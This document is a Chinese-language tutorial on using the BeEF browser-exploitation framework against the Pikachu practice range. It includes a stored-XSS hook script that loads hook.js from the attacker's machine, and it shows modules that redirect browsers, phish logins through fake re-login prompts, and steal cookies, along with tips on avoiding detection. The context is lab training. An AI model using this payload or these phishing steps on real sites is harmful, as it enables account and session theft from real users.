beef-xss是kali所具备的一个功能强大的工具下载方式传送门
1.apt-get update
2.apt-get install beef-xss
以上两个全部是下载beef-xss
3.beef-xss(开启的指令)
在这里我们依旧使用一个pikachu的靶场。
如何连接上beef
<script src="http://192.168.141.130:3000/hook.js"></script>
我们在存储型的xss漏洞中插入这段恶意代码
然后刷新页面再返回beef就可以发现我们的网站已经链接上了。
在beef-xss当中我们最常用的就是Commands模块,其他模块基本上用不到。
beef-xss模块的使用
1.模块Redirect Browser :
在我们在commands模块中搜索redirect点击其中的第一个模块。
接下来我们就可以进行一个攻击,先更改定向跳转的网址为百度。
Execute将我们的指令进行一个执行,会发现我们的pikachu页面跳转为了百度的页面。达到了一个攻击的效果。
2.模块Pretty Theft:
我们搜索pretty找到利用模块
改变其中的Custom Logo内容为我们的beef-xss虚拟机的地址
http://192.168.141.130:3000/ui/media/images/beef.png
就更改地址即可
执行后在返回pikachu靶场发现
提示我们登录过期要重新进行一个登录,以此我们可以攻击获得用户的账号和密码。
我们输入账号:
然后回来就可以看到,我们已经获取到了账号与密码
我们还可以选择弹窗的类别
3.Browser:
在这里面
[绿色]随便使用不会被察觉。
其他颜色都有被发现的风险。
我们最常用的就是获取cookie的一个模块,可以轻松获取到用户的cookie。
其中还有获取页面html代码等等的功能。
4.模块Google Phishing:
和pretty模块一个形式
得到用户账号和密码
但是为什么我会将一个基本上一样的提出来再讲一次呢?
师傅们自己去试一下就会发现它会再衍生出一个空页面。这是有一定暴露风险的,所以我希望通过这个来告诉各位师傅,注意小心使用除绿色外的模块。